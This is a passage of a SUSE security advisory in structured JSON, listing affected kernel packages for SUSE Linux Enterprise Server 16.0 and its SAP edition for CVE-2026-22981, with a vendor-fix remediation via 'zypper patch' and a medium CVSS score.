"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22981",
"url": "https://www.suse.com/security/cve/CVE-2026-22981"
},
{
"category": "external",
"summary": "SUSE Bug 1257225 for CVE-2026-22981",
"url": "https://bugzilla.suse.com/1257225"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
